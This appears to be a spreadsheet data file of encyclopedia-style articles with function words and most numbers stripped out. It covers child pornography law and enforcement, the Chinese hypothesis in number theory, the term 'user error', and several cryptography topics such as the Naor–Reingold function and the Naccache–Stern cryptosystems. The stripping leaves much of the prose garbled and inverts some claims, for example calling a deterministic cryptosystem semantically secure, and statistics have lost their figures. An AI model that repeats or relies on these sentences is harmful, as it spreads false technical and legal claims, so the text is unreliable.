trained staff track child pornography files computers used share distributed internet, freely share identifying information computers users internationally.in europe circamp enforcement project aimed reducing availability abusive material web, combining traditional police investigative methods police/internet industry cooperation blocking access domains containing files. result country specific lists according national legislation participating countries. this police initiative worldwide scope work partly financed european commission. when child pornography distributed across international borders, customs agencies also participate investigations enforcement, 2001–2002 cooperative effort united states customs service local operational enforcement agencies russia. search warrant issued customs service resulted seizing computers email records russian authorities, arrests pornographers.in spite international cooperation, less percent children appear child pornography located enforcement year, according interpol statistics.google announced 2008 working ncmec help automate streamline child protection workers sift millions pornographic images identify victims abuse. google developed video fingerprinting technology software automate review million pornographic images videos analysts center previously review manually.the begun posting hyperlinks internet purport illegal videos minors sex, raiding homes anyone willing click them.in october 2011, hacking collective anonymous announced began taking child pornography websites darknet vigilante move, released alleged user names pastebin link. national international child pornography laws provide severe penalties producers distributors almost societies, usually including incarceration, shorter duration sentences non-commercial distribution depending extent content material distributed. convictions possessing child pornography also usually include prison sentences, sentences often converted probation first-time offenders. 2006, international centre missing exploited children (icmec) published report findings presence child pornography legislation then-184 interpol member countries. later updated information, subsequent editions, include member countries. report, entitled "child pornography: model legislation global review", assesses whether national legislation: exists specific regard child pornography; provides definition child pornography; expressly criminalizes computer-facilitated offenses; criminalizes knowing possession child pornography, regardless intent distribute; requires isps report suspected child pornography enforcement mandated agency. icmec stated found initial report countries legislation needed deal child pornography offenses, countries legislation specifically addressed child pornography, making child pornography global issue worsened inadequacies domestic legislation. edition report found still countries legislation needed deal child pornography offenses, legislation specifically addressing problem. over seven years research 2006 2012, icmec koons family institute international policy report worked countries revised place child pornography laws.a 2008 review child pornography laws countries international centre missing exploited children (icmec) showed laws specifically addressed child pornography. did, criminalize possession child pornography regardless intent distribute. this review, however, count legislation outlawing pornography "specific" child pornography. also count bans "the worst forms child labor". some societies canada australia laws banning cartoon, manga, written child pornography others require isps (internet service providers) monitor internet traffic detect it.the united nations optional protocol sale children, child prostitution child pornography requires parties outlaw "producing, distributing, disseminating, importing, exporting, offering, selling possessing purposes" child pornography. council europe's cybercrime convention framework decision became active 2006 require signatory member states criminalize aspects child pornography. article united nations convention rights child (uncrc) stated signatories shall take appropriate measures prevent exploitative children pornographic performances materials. artificially generated simulated imagery simulated child pornography produced without direct involvement children production process includes modified photographs real children, non-minor teenagers made look younger (age regression), fully computer-generated imagery, adults made look like children. drawings animations depict sexual acts involving children intended look like photographs also regarded child pornography. sexting filming among minors sexting sending, receiving, forwarding sexually explicit messages, photographs, images, primarily mobile phones, oneself others (such dating partners friends). also include computer digital device. such images passed along others posted internet. many jurisdictions, consent lower majority, minor consent legally person age. many laws child pornography passed cell phone cameras became common among teenagers close consent sexting understood phenomenon. teenagers legally able consent sex, majority, charged production distribution child pornography send naked images friends partners age. university hampshire's crimes against children research center estimates percent people arrested suspicion child pornography production 2009 teenagers shared images peers consensually. such arrests also include teenage couples friends small disparity, legal adult not. countries, mandatory sentencing requires anybody convicted offense placed offender registry.the vast majority underage sexual images produced adults adults often solicit underage teenagers share images.legal professionals academics criticized child pornography laws mandatory punishments teenagers consent offenses. florida cyber crimes defense attorney david seltzer wrote believe child pornography laws designed situations conviction possession child pornography florida draws five years prison picture video, plus lifelong requirement register offender."in 2013 interview, assistant professor communications university colorado denver, adele hasinoff, studies repercussions sexting stated "very harsh" child pornography laws "designed address adults exploiting children" replace better education consent training teens. went say, "sexting act, consensual, that's fine anyone distributes pictures without consent something malicious abusive, child pornography laws harsh address it."in april 2018, daily telegraph reported sexually explicit images children teenagers year-olds) found internet, made children teenagers november 2017 february 2018, december 2017; cases january 2017 1717 january 2018. images made children teenagers photographing filming selfies, without adults present coercing, unwittingly imitating adult pornographic nude images videos (including celebrities) found internet. report said offenders trawled amassed images. organizations there many anti-child pornography organizations, financial coalition against child pornography, association sites advocating child protection, ecpat international, international justice mission. also references external links national center missing exploited children (usa). "child pornography fact sheet". archived original november 2007. national society prevention cruelty children (uk). "child abuse images internet: reading list". archived original february 2012. retrieved november 2009. oppenheimer, mark, video submission south african parliament virtual child pornography, part youtube, part part part part child pornography case results lengthy prison sentences,</t>
  </si>
  <si>
    <t>Chinese hypothesis</t>
  </si>
  <si>
    <t>number theory, chinese hypothesis disproven conjecture stating integer prime satisfies condition {\displaystyle 2^{n}-2} divisible n—in words, integer prime {\displaystyle 2^{n}\equiv 2{\bmod {n}}} true prime, {\displaystyle 2^{n}\equiv 2{\bmod {n}}} (this special case fermat's little theorem), however converse {\displaystyle 2^{n}\equiv 2{\bmod {n}}} prime) false, therefore hypothesis whole false. smallest counterexample 11×31. composite numbers {\displaystyle 2^{n}-2} divisible called poulet numbers. they special class fermat pseudoprimes. history once, sometimes still, mistakenly thought ancient chinese origin, chinese hypothesis actually originates mid-19th century work qing dynasty mathematician shanlan (1811–1882). later made aware statement incorrect removed subsequent work enough prevent false proposition appearing elsewhere name; later mistranslation 1898 work jeans dated conjecture confucian times gave birth ancient origin myth. references bibliography dickson, leonard eugene (2005), history theory numbers, vol. divisibility primality, york: dover, isbn 0-486-44232-2 erdős, paul (1949), converse fermat's theorem", american mathematical monthly, (9): 623–624, doi:10.2307/2304732 honsberger, ross (1973), chinese theorem pierre fermat", mathematical gems, vol. washington, math. assoc. amer., jeans, james (1898), "the converse fermat's theorem", messenger mathematics, needham, joseph (1959), "ch. 19", science civilisation china, vol. mathematics sciences heavens earth, cambridge, england: cambridge university press (1991), transmission western mathematics kangxi kingdom influence over chinese mathematics, beijing: ph.d. thesis ribenboim, paulo (1996), book prime number records, york: springer-verlag, 103–105, isbn 0-387-94457-5 shanks, daniel (1993), solved unsolved problems number theory (4th ed.), york: chelsea, 19–20, isbn 0-8284-1297-9 yan; shiran (1987), chinese mathematics: concise history, translated john crossley anthony w.-c. lun, oxford, england: clarendon press, isbn 0-19-858181-5</t>
  </si>
  <si>
    <t>User error</t>
  </si>
  <si>
    <t>user error error made human user complex system, usually computer system, interacting although term sometimes used human–computer interaction practitioners, formal human error term used context human reliability. related terms pebmac ("problem exists monitor chair"), identity error id-10t/1d-10t error ("idiot error"), picnic ("problem chair, computer"), error ("idiot behind machine error") similar phrases also used slang technical circles derogatory meaning. this usage implies lack computer savviness, asserting problems arising using device fault user. critics term argue problems caused instead device take account human limitations thus designed induces errors.the term also used non-computer-related mistakes. causes joel spolsky points users usually full attention computer system using suggests compensating building usable systems, thus allowing higher percentage users complete tasks without errors: example, suppose goal program allow people convert digital camera photos photo album. group average users program complete task, usable program higher percentage users able successfully create photo album. scientific imagine real world users. they necessarily familiar computers. they many diverse talents, distinctly talents computer area. some distracted program. phone ringing. baby crying. keeps jumping desk batting around mouse. now, even without going experiment, state confidence users simply fail complete task, take extraordinary amount time experts interaction design alan cooper believe concept puts blame wrong place, user, instead blaming error-inducing design failure take account human limitations. bruce "tog" tognazzini describes anecdote dilbert creator scott adams losing significant amount work comment moderation blog poorly constructed application conveyed wrong mental model, even though user took explicit care preserve data.jef raskin advocated designing devices ways prevent erroneous actions.don norman suggests changing common technical attitude towards user error: don't think user making errors; think actions approximations desired. acronyms names terms like pebmac/pebcak id10t error often used tech support operators computer experts describe user error problem attributed user's ignorance instead software hardware malfunction. these phrases used humorous describe user errors. highly popularized example user mistaking cd-rom tray holder, user looking "any key". however, variety stupidity ignorance-induced problems described user errors. pebkac/pebcak/picnic phrases used tech savvy mean problem caused entirely fault user include pebkac acronym "problem exists keyboard chair"), pebcak alternative, similar, acronym "problem exists chair keyboard"), pobcak government/military acronym "problem occurs chair keyboard"), picnic ("problem chair computer") ebkac ("error keyboard chair"). another variant pebuak (problem exists between user keyboard). 2006, intel began running number pebcak web-based advertisements promote vpro platform. id-10-t error id-ten-t error (also seen id10t id107) masked user: id-ten-t spelled becomes id10t ("idiot"). also known "ten-t error" "id:10t error". user friendly comic strip presented usage cartoon february 1999.in united states navy army slang, term similar meaning, though pronounced differently: navy pronounces id10t "eye tango". army instead uses word 1d10t pronounces "one delta tango". related terms some support technicians refer "biological interface error". networking administrators' version referring cause problem "layer issue", referring "user" "political" layer 7-layer model computer networking computing jargon refers "wetware bugs" user considered part system, hardware/software/wetware layering. automotive repair persons' version referring cause problem "faulty steering actuator", "broken linkage seat steering wheel", "loose steering wheel seat," simply, "loose behind wheel." similarly, typewriter repair people used refer loose behind keyboard" "defective keyboard controller." broadcast engineering amateur radio version referred "short headphones". another term used public safety 2-way radio (i.e. police, fire, ambulance, etc.) "defective button actuator". another similar term used united states military "operator headspace timing issue" "oht," borrowing terminology related operation browning machine gun.in danish called fejl "error 40", indicating error centimetres device. swedish phrase skit bakom spakarna ("shit behind levers") abbreviation "sbs-problem" used. variant used domain skit bakom tangenterna ("shit behind keyboard") abbreviated "sbt". french described "icc" problem (interface chaise-clavier), problem keyboard-chair interface, similarly pebkac. québec called cas-18, indicating error inches device. better known "code-18". "(it's carbon based error", indicates user problem humans carbon-based life-form), opposed silicon one.in portuguese called "bios problem" (burro idiota operando sistema), translated "dumb idiot operating system", (utilizador super burro), translated "super dumb user".in german called "dau" (dümmster anzunehmender user), literally translated "dumbest assumed user", referring common engineering acronym "gau" (größter anzunehmender unfall), maximum credible accident, worst-case scenario. also error message latent human error luser local user, loser mode error rtfm social engineering pilot error undo references</t>
  </si>
  <si>
    <t>Torus-based cryptography</t>
  </si>
  <si>
    <t>torus-based cryptography involves using algebraic tori construct group ciphers based discrete logarithm problem. this idea first introduced alice silverberg karl rubin 2003 form public algorithm name ceilidh. improves conventional cryptosystems representing elements large finite fields compactly therefore transmitting fewer bits. also torus references karl rubin, alice silverberg: torus-based cryptography. crypto 2003: 349–365 external links torus-based cryptography paper introducing concept pdf).</t>
  </si>
  <si>
    <t>Naor–Reingold pseudorandom function</t>
  </si>
  <si>
    <t>1997, moni naor omer reingold described efficient constructions various cryptographic primitives private well public-key cryptography. their result construction efficient pseudorandom function. prime numbers |p−1. select element {\displaystyle {\mathbb _{p}}^{*}} multiplicative order then (n+1)-dimensional vector (a0,a1, ..., an)∈ {\displaystyle (\mathbb _{l})^{n+1}} define function {\displaystyle f_{a}(x)=g^{a_{0}\cdot a_{1}^{x_{1}}a_{2}^{x_{2}}...a_{n}^{x_{n}}}\in \mathbb _{p}} representation integer 2n−1, extra leading zeros necessary. example |p−1. select {\displaystyle {\mathbb _{7}}^{*}} multiplicative order (since (the representation 101), compute {\displaystyle f_{a}(5)} follows: {\displaystyle f_{a}(x)=g^{a_{0}\cdot a_{1}^{x_{1}}a_{2}^{x_{2}}...a_{n}^{x_{n}}}\in \mathbb _{p}} {\displaystyle f_{a}(5)=4^{1\cdot 1^{1}2^{0}1^{1}}=4^{1}=4\in \mathbb _{7}} efficiency evaluation function {\displaystyle f_{a}(x)} naor–reingold construction done efficiently. computing value function {\displaystyle f_{a}(x)} given point comparable modular exponentiation n-modular multiplications. this function computed parallel threshold circuits bounded depth polynomial size. naor–reingold function used basis many cryptographic schemes including symmetric encryption, authentication digital signatures. security function assume attacker sees several outputs function, e.g. {\displaystyle f_{a}(1)=g^{a_{1}},f_{a}(2)=g^{a_{2}},f_{a}(3)=g^{a_{1}a_{2}}} {\displaystyle f_{a}(k)=g^{a_{1}^{x_{1}}a_{2}^{x_{2}}...a_{n}^{x_{n}}}} wants compute {\displaystyle f_{a}(k+1)} assume simplicity attacker needs solve computational diffie–hellman (cdh) {\displaystyle f_{a}(1)=g^{a_{1}}} {\displaystyle f_{a}(k)=g^{a_{2}^{x_{2}}...a_{n}^{x_{n}}}} {\displaystyle f_{a}(k+1)=g^{a_{1}a_{2}^{x_{2}}\dots a_{n}^{x_{n}}}} general, moving changes pattern unless power split exponent {\displaystyle f_{a}(k+1)} computation corresponds computing diffie–hellman earlier results. this attacker wants predict next sequence element. such attack would bad—but also possible fight working groups hard diffie–hellman problem (dhp). example: attacker sees several outputs function e.g. {\displaystyle f_{a}(5)=4^{1^{1}2^{0}1^{1}}=4^{1}=4} previous example, {\displaystyle f_{a}(1)=4^{1^{0}2^{0}1^{1}}=4^{1}=4} then, attacker wants predict next sequence element function, {\displaystyle f_{a}(6)} however, attacker cannot predict outcome {\displaystyle f_{a}(6)} knowing {\displaystyle f_{a}(1)} {\displaystyle f_{a}(5)} there attacks would pseudorandom number generator: user expects random numbers output, course stream predictable, even more, indistinguishable random string. {\displaystyle {\mathcal {a}}^{f}} denote algorithm {\displaystyle {\mathcal {a}}} access oracle evaluating function {\displaystyle f_{a}(x)} suppose decisional diffie–hellman assumption holds {\displaystyle \mathbb _{p}} naor reingold show every probabilistic polynomial time algorithm {\displaystyle {\mathcal {a}}} sufficiently large {\displaystyle {\text{pr }}[{\mathcal {a}}^{f_{a}(x)}(p,g)\to 1]-{\text{pr }}[{\mathcal {a}}^{r}(p,g)\to negligible.the first probability taken choice seed second probability taken random distribution induced {\displaystyle {\mathcal {i}}{\mathcal {g}}(n)} instance generator, random choice function {\displaystyle r_{a}(x)} among {\displaystyle \{0,1\}^{n}\to \mathbb _{p}} functions. linear complexity natural measure useful sequence cryptographic purposes size linear complexity. linear complexity n-element sequence w(x), 0,1,2,…,n ring {\displaystyle {\mathcal {r}}} length shortest linear recurrence relation al−1 +l−1) w(x), 0,1,2,…, al−1 {\displaystyle {\mathcal {r}}} satisfied sequence. {\displaystyle \gamma {\displaystyle \gamma {\displaystyle \log {\displaystyle \delta sufficiently large linear complexity sequence {\displaystyle f_{a}(x)} 2n-1, denoted {\displaystyle l_{a}} satisfies {\displaystyle l_{a}\geqslant {\begin{cases}l^{1-\ \delta \,\!}&amp;{\text{, }}\gamma \,\!\geqslant 2\\l^{\left({\tfrac \gamma \,\!}{2-\ \delta \,\!}}\right)}&amp;{\text{, }}\gamma \,\!&lt;2\end{cases}}} except possibly {\displaystyle 3(l-1)^{n-\delta vectors {\displaystyle (\mathbb _{l})^{n}} bound work disadvantages, namely apply interesting case {\displaystyle \log p\approx \log n\approx {n.}} uniformity distribution statistical distribution {\displaystyle f_{a}(x)} exponentially close uniform distribution almost vectors {\displaystyle (\mathbb _{l})^{n}} {\displaystyle {\mathbf }_{a}} discrepancy {\displaystyle \{f_{a}(x)|0\leq x\leq 2^{n-1}\}} thus, {\displaystyle n=\log length vectors {\displaystyle (\mathbb _{l})^{n}} bound {\displaystyle {\mathbf }_{a}\leq \delta (l,p)} holds, {\displaystyle \delta (l,p)={\begin{cases}p^{\left({\tfrac {1-\ \gamma \,\!}{2}}\right)}l^{\left({\tfrac {-1}{2}}\right)}\log ^{2}p&amp;{\text{ }}l\geqslant p^{\gamma \,\!}\\p^{\left({\tfrac {1}{2}}\right)}l^{-1}\log ^{2}p&amp;{\text{ }}p^{\gamma \,\!}&gt;l\geqslant p^{\left({\tfrac {2}{3}}\right)}\\p^{\left({\tfrac {1}{4}}\right)}l^{\left({\tfrac {-5}{8}}\right)}\log ^{2}p&amp;{\text{ }}p^{\left({\tfrac {2}{3}}\right)}&gt;l\geqslant p^{\left({\tfrac {1}{2}}\right)}\\p^{\left({\tfrac {1}{8}}\right)}l^{\left({\tfrac {-3}{8}}\right)}\log ^{2}p&amp;{\text{ }}p^{\left({\tfrac {1}{2}}\right)}&gt;l\geqslant p^{\left({\tfrac {1}{3}}\right)}\\\end{cases}}} 0.9150 {\displaystyle \gamma =2.5-\log 3=0.9150\cdots although property seem immediate cryptographic implications, inverse fact, namely uniform distribution, true would disastrous consequences applications function. sequences elliptic curve elliptic curve version function interest well. particular, help improve cryptographic security corresponding system. prime elliptic curve {\displaystyle \mathbb _{p}} vector defines finite sequence subgroup {\displaystyle \langle g\rangle {\displaystyle f_{a}(x)=(a_{1}^{x_{1}}a_{2}^{x_{2}}\dots a_{n}^{x_{n}})g} {\displaystyle x=x_{1}\dots x_{n}} representation integer {\displaystyle x,0\leq x\leq 2^{n-1}} naor–reingold elliptic curve sequence defined abscissa {\displaystyle u_{k}=x(f_{a}(k))\;{\mbox{where }}x(p){\mbox{ abscissa of}}\;p\in decisional diffie–hellman assumption holds, index enough compute {\displaystyle u_{k}} polynomial time, even attacker performs polynomially many queries random oracle. also decisional diffie–hellman assumption finite field inversive congruential generator generalized inversive congruential pseudorandom numbers notes references naor, moni; reingold, omer (2004), "number-theoretic constructions efficient pseudo-random functions", journal association computing machinery, (2): 231–262, doi:10.1145/972639.972643, s2cid 8665271. shparlinski, igor (2003), cryptographic applications analytic number theory: complexity lower bounds pseudorandomness (first ed.), birkhäuser basel, isbn 978-3-7643-6654-4 goldreich, oded (1998), modern cryptography, probabilistic proofs pseudorandomness (first ed.), springer, isbn 978-3-540-64766-9</t>
  </si>
  <si>
    <t>Triple modular redundancy</t>
  </si>
  <si>
    <t>computing, triple modular redundancy, sometimes called triple-mode redundancy, (tmr) fault-tolerant form n-modular redundancy, three systems perform process result processed majority-voting system produce single output. three systems fails, systems correct mask fault. concept applied many forms redundancy, software redundancy form n-version programming, commonly found fault-tolerant computer systems. space satellite systems often tmr, although satellite usually uses hamming error correction.some memory uses triple modular redundancy hardware (rather common hamming code), triple modular redundancy hardware faster hamming error correction hardware. called repetition code, communication systems n-modular redundancy simple form forward error correction. example, 5-modular redundancy communication systems (such flexray) majority samples results erroneous, results correct mask fault. modular redundancy basic concept, dating antiquity, first computer czechoslovak computer sapo, 1950s. general case general case called n-modular redundancy, positive number replications action used. number typically taken least three, error correction majority vote take place; also usually taken odd, ties happen. majority logic gate tmr, three identical logic circuits (logic gates) used compute specified boolean function. circuit failures, outputs three circuits identical. circuit failures, outputs three circuits different. majority logic gate used decide circuits' outputs correct output. majority gate output inputs majority gate output majority gate's inputs majority logic gate simple and–or circuit: inputs majority gate denoted output majority gate {\displaystyle xy\lor yz\lor thus, majority gate carry output full adder, i.e., majority gate voting machine. operation assuming boolean function computed three identical logic gates value then: circuit failed, three circuits produce output value majority gate output value circuit fails produces output working correctly produce output majority gate output i.e., still correct value. similarly case boolean function computed three identical circuits value thus, majority gate output guaranteed correct long three identical logic circuits failed.for system single voter reliability (probability working) three components reliability probability correct shown rtmr rm3).tmr systems data scrubbing rewrite flip-flops periodically order avoid accumulation errors. voter majority gate could fail. this protected applying triple redundancy voters themselves.in systems, saturn launch vehicle digital computer functional triple modular redundancy (ftmr) systems, voters also triplicated. three voters used copy next stage logic. systems single point failure.even though using single voter brings single point failure failed voter bring entire system systems triplicated voters. this majority gates much less complex systems guard against, much reliable. using reliability calculations, possible find minimum reliability voter win. chronometers triple modular redundancy, ship must least three chronometers; chronometers provided dual modular redundancy, allowing backup cease work, allowing error correction displayed different time, since case contradiction chronometers, would impossible know wrong (the error detection obtained would chronometer checking periodically). three chronometers provided triple modular redundancy, allowing error correction three wrong, pilot would take average closer reading (vote average precision). there adage effect, stating: "never chronometers; take three."mainly means chronometers contradict, know correct? time observation rule expensive cost three sufficiently accurate chronometers cost many types smaller merchant vessels. some vessels carried three chronometers example, beagle carried chronometers. however, large number usually carried ships undertaking survey work case beagle. modern era, ships gnss navigation receivers (with gps, glonass waas etc. support) mostly running waas egnos support provide accurate time (and location). popular culture three pre-cogs minority report lead conviction even disagrees. rule single fluke", competitions three falls match. this true tmr, however, three falls independent competitor knows falls point competition, influences future actions. arthur clarke's science fiction novel rendezvous rama, ramans make heavy triple redundancy. popular anime neon genesis evangelion, magi three biological supercomputers must agree majority vote delivering decision. also fault tolerant system lockstep (computing) segal's references external links article reference usage avionics industry johnson, wirthlin, (2010, february). voter insertion algorithms fpga designs using triple modular redundancy. proceedings 18th annual acm/sigda international symposium field programmable gate arrays (pp. 249–258). acm.</t>
  </si>
  <si>
    <t>Naccache–Stern cryptosystem</t>
  </si>
  <si>
    <t>naccache–stern cryptosystem homomorphic public-key cryptosystem whose security rests higher residuosity problem. naccache–stern cryptosystem discovered david naccache jacques stern 1998. scheme definition like many public cryptosystems, scheme works group {\displaystyle (\mathbb /n\mathbb )^{*}} product large primes. this scheme homomorphic hence malleable. generation pick family small distinct primes p1,...,pk. divide half {\displaystyle u=\prod _{i=1}^{k/2}p_{i}} {\displaystyle v=\prod _{k/2+1}^{k}p_{i}} {\displaystyle \sigma =uv=\prod _{i=1}^{k}p_{i}} choose large primes 2au+1 q=2bv+1 prime. n=pq. choose random order φ(n)/4.the public numbers σ,n,g private pair p,q. when essentially benaloh cryptosystem. message encryption this system allows encryption message group {\displaystyle \mathbb /\sigma \mathbb pick random {\displaystyle x\in \mathbb /n\mathbb calculate {\displaystyle e(m)=x^{\sigma }g^{m}\mod then e(m) encryption message message decryption decrypt, first find apply chinese remainder theorem calculate {\displaystyle \sigma given ciphertext decrypt, calculate {\displaystyle c_{i}\equiv c^{\phi (n)/p_{i}}\mod thus {\displaystyle {\begin{matrix}c^{\phi (n)/p_{i}}&amp;\equiv &amp;x^{\sigma \phi (n)/p_{i}}g^{m\phi (n)/p_{i}}\mod n\\&amp;\equiv &amp;g^{(m_{i}+y_{i}p_{i})\phi (n)/p_{i}}\mod n\\&amp;\equiv &amp;g^{m_{i}\phi (n)/p_{i}}\mod n\end{matrix}}} {\displaystyle m_{i}\equiv m\mod p_{i}} since chosen small, recovered exhaustive search, i.e. comparing {\displaystyle c_{i}} {\displaystyle g^{j\phi (n)/p_{i}}} pi-1. once known recovered direct application chinese remainder theorem. security semantic security naccache–stern cryptosystem rests extension quadratic residuosity problem known higher residuosity problem. references naccache, david; stern, jacques (1998). public cryptosystem based higher residues". proceedings conference computer communications security. '98. acm. 59–66. doi:10.1145/288090.288106. isbn 1-58113-007-4.</t>
  </si>
  <si>
    <t>Cryptographic protocol</t>
  </si>
  <si>
    <t>security protocol (cryptographic protocol encryption protocol) abstract concrete protocol performs security-related function applies cryptographic methods, often sequences cryptographic primitives. protocol describes algorithms used includes details data structures representations, point used implement multiple, interoperable versions program.cryptographic protocols widely used secure application-level data transport. cryptographic protocol usually incorporates least aspects: agreement establishment entity authentication symmetric encryption message authentication material construction secured application-level data transport non-repudiation methods secret sharing methods secure multi-party computationfor example, transport layer security (tls) cryptographic protocol used secure (https) connections. entity authentication mechanism, based x.509 system; setup phase, symmetric encryption formed employing public-key cryptography; application-level data transport function. these three aspects important interconnections. standard non-repudiation support. there types cryptographic protocols well, even term various readings; cryptographic application protocols often underlying agreement methods, also sometimes referred "cryptographic protocols". instance, employs known diffie–hellman exchange, although part diffie–hellman seen complete cryptographic protocol applications. advanced cryptographic protocols wide variety cryptographic protocols beyond traditional goals data confidentiality, integrity, authentication also secure variety desired characteristics computer-mediated collaboration. blind signatures used digital cash digital credentials prove person holds attribute right without revealing person's identity identities parties person transacted with. secure digital timestamping used prove data (even confidential) existed certain time. secure multiparty computation used compute answers (such determining highest auction) based confidential data (such private bids), protocol complete participants know input answer. end-to-end auditable voting systems provide sets desirable privacy auditability properties conducting e-voting. undeniable signatures include interactive protocols allow signer prove forgery limit verify signature. deniable encryption augments standard encryption making impossible attacker mathematically prove existence plain text message. digital mixes create hard-to-trace communications. formal verification cryptographic protocols sometimes verified formally abstract level. when done, necessity formalize environment protocol operates order identify threats. this frequently done dolev-yao model. logics, concepts calculi used formal reasoning security protocols: burrows–abadi–needham logic (ban logic) dolev–yao model π-calculus protocol composition logic (pcl) strand spaceresearch projects tools used formal verification security protocols: automated validation internet security protocols applications (avispa) follow-up project avantssarconstraint logic-based attack searcher (cl-atse) open-source fixed-point model-checker (ofmc) sat-based model-checker (satmc) casper cryptoverif cryptographic protocol shapes analyzer (cpsa) knowledge security protocols (kiss) maude-nrl protocol analyzer (maude-npa) proverif scyther tamarin prover notion abstract protocol formally verify protocol often abstracted modelled using alice notation. simple example following: {\displaystyle a\rightarrow b:\{x\}_{k_{a,b}}} this states alice {\displaystyle intends message {\displaystyle consisting message {\displaystyle encrypted shared {\displaystyle k_{a,b}} examples internet exchange ipsec kerberos off-the-record messaging point point protocol secure shell (ssh) signal protocol transport layer security zrtp also list cryptosystems secure channel security protocols open repository comparison cryptography libraries references further reading ermoshina, ksenia; musiani, francesca; halpin, harry (september 2016). "end-to-end encrypted messaging protocols: overview" (pdf). bagnoli, franco; (eds.). internet science. insci 2016. florence, italy: springer. 244–254. doi:10.1007/978-3-319-45982-0_22. isbn 978-3-319-45982-0.</t>
  </si>
  <si>
    <t>Naccache–Stern knapsack cryptosystem</t>
  </si>
  <si>
    <t>naccache–stern knapsack cryptosystem atypical public-key cryptosystem developed david naccache jacques stern 1997. this cryptosystem deterministic, hence semantically secure. while unbroken date, system also lacks provable security. system overview this system based type knapsack problem. specifically, underlying problem this: given integers c,n,p v0,...,vn, find vector {\displaystyle x\in \{0,1\}^{n}} {\displaystyle c\equiv \prod _{i=0}^{n}v_{i}^{x_{i}}\mod idea relatively prime much smaller modulus problem solved easily. observation allows decryption. generation generate public/private pair pick large prime modulus pick positive integer prime, starting {\displaystyle \prod _{i=0}^{n}p_{i}&lt;p} pick secret integer p-1, gcd(p-1,s) {\displaystyle v_{i}={\sqrt[{s}]{p_{i}}}\mod .the public v0,...,vn. private encryption encrypt n-bit long message calculate {\displaystyle c=\prod _{i=0}^{n}v_{i}^{m_{i}}\mod message decryption decrypt message calculate {\displaystyle m=\sum _{i=0}^{n}{\frac {2^{i}}{p_{i}-1}}\times \left(\gcd(p_{i},c^{s}\mod p)-1\right)} this works fraction {\displaystyle {\frac {\gcd(p_{i},c^{s}\mod p)-1}{p_{i}-1}}} depending whether divides also merkle–hellman knapsack cryptosystem graham–shamir knapsack cryptosystem references original paper recent bandwidth improvement</t>
  </si>
  <si>
    <t>Cryptographic nonce</t>
  </si>
  <si>
    <t>cryptography, nonce (number once) arbitrary number used cryptographic communication. often random pseudo-random number issued authentication protocol ensure communications cannot reused replay attacks. they also useful initialization vectors cryptographic hash functions. definition nonce arbitrary number used cryptographic communication, spirit nonce word. they often random pseudo-random numbers. many nonces also include timestamp ensure exact timeliness, though requires clock synchronisation organisations. addition client nonce ("cnonce") helps improve security ways implemented digest access authentication. ensure nonce used once, time-variant (including suitably fine-grained timestamp value), generated enough random bits ensure probabilistically insignificant chance repeating previously generated value. some authors define pseudo-randomness unpredictability) requirement nonce. usage authentication authentication protocols nonces ensure communications cannot reused replay attacks. instance, nonces used http digest access authentication calculate digest password. nonces different time authentication challenge response code presented, thus making replay attacks virtually impossible. scenario ordering products internet provide example usefulness nonces replay attacks. attacker could take encrypted information and—without needing decrypt—could continue send particular order supplier, thereby ordering products name purchase information. nonce used give 'originality' given message company receives orders person nonce, discard invalid orders. nonce used ensure security stream cipher. where used message different nonce used ensure keystream different different messages encrypted key; often message number used. secret nonce values used lamport signature scheme signer-side secret selectively revealed comparison public hashes signature creation verification. initialization vectors initialization vectors referred nonces, typically random pseudo-random. hashing nonces used proof-of-work systems vary input cryptographic hash function obtain hash certain input fulfils certain arbitrary conditions. becomes difficult create "desirable" hash verify shifting burden work onto side transaction system. example, proof work, using hash functions, considered means combat email spam forcing email senders find hash value email (which included timestamp prevent pre-computation useful hashes later use) arbitrary number leading zeroes, hashing input large number values "desirable" hash obtained. similarly, bitcoin blockchain hashing algorithm tuned arbitrary difficulty changing required minimum/maximum value hash number bitcoins awarded blocks increase linearly increased network computation power users join. this likewise achieved forcing bitcoin miners nonce values value hashed change hash algorithm output. cryptographic hash algorithms cannot easily predicted based inputs, makes blockchain hashing possibility awarded bitcoins something lottery, first "miner" find nonce delivers desirable hash awarded bitcoins. also stretching salt (cryptography) nonce word references external links 2617 http authentication: basic digest access authentication 3540 robust explicit congestion notification (ecn) signaling nonces 4418 umac: message authentication code using universal hashing services security</t>
  </si>
  <si>
    <t>Cryptographic multilinear map</t>
  </si>
  <si>
    <t>cryptographic {\displaystyle -multilinear kind multilinear map, function {\displaystyle e:g_{1}\times \cdots \times g_{n}\rightarrow g_{t}} integers {\displaystyle a_{1},\ldots ,a_{n}} elements {\displaystyle g_{i}\in g_{i}} {\displaystyle e(g_{1}^{a_{1}},\ldots ,g_{n}^{a_{n}})=e(g_{1},\ldots ,g_{n})^{\prod _{i=1}^{n}a_{i}}} addition efficiently computable satisfy security properties. several applications cryptography, exchange protocols, identity-based encryption, broadcast encryption. there exist constructions cryptographic 2-multilinear maps, known bilinear maps, however, problem constructing multilinear maps {\displaystyle n&gt;2} seems much difficult security proposed candidates still unclear. definition case, multilinear maps mostly known bilinear maps parings, usually defined follows: {\displaystyle g_{1},g_{2}} additive cyclic groups prime order {\displaystyle {\displaystyle g_{t}} another cyclic group order {\displaystyle written multiplicatively. pairing map: {\displaystyle e:g_{1}\times g_{2}\rightarrow g_{t}} satisfies following properties: bilinearity {\displaystyle \forall a,b\in f_{q}^{*},\ \forall p\in g_{1},q\in g_{2}:\ e(ap,bq)=e(p,q)^{ab}} non-degeneracy {\displaystyle g_{1}} {\displaystyle g_{2}} generators {\displaystyle g_{1}} {\displaystyle g_{2}} respectively, {\displaystyle e(g_{1},g_{2})} generator {\displaystyle g_{t}} computability there exists efficient algorithm compute {\displaystyle addition, security purposes, discrete logarithm problem required hard {\displaystyle g_{1}} {\displaystyle g_{2}} general case (for {\displaystyle e:g_{1}\times \cdots \times g_{n}\rightarrow g_{t}} {\displaystyle -multilinear satisfies following properties: {\displaystyle g_{i}} (for {\displaystyle 1\leq i\leq {\displaystyle g_{t}} groups order; {\displaystyle a_{1},\ldots ,a_{n}\in \mathbb {\displaystyle (g_{1},\ldots ,g_{n})\in g_{1}\times \cdots \times g_{n}} {\displaystyle e(g_{1}^{a_{1}},\ldots ,g_{n}^{a_{n}})=e(g_{1},\ldots ,g_{n})^{\prod _{i=1}^{n}a_{i}}} non-degenerate sense {\displaystyle g_{1},\ldots ,g_{n}} generators {\displaystyle g_{1},\ldots ,g_{n}} respectively, {\displaystyle e(g_{1},\ldots ,g_{n})} generator {\displaystyle g_{t}} there exists efficient algorithm compute {\displaystyle addition, security purposes, discrete logarithm problem required hard {\displaystyle g_{1},\ldots ,g_{n}} candidates candidates multilinear maps actually slightly 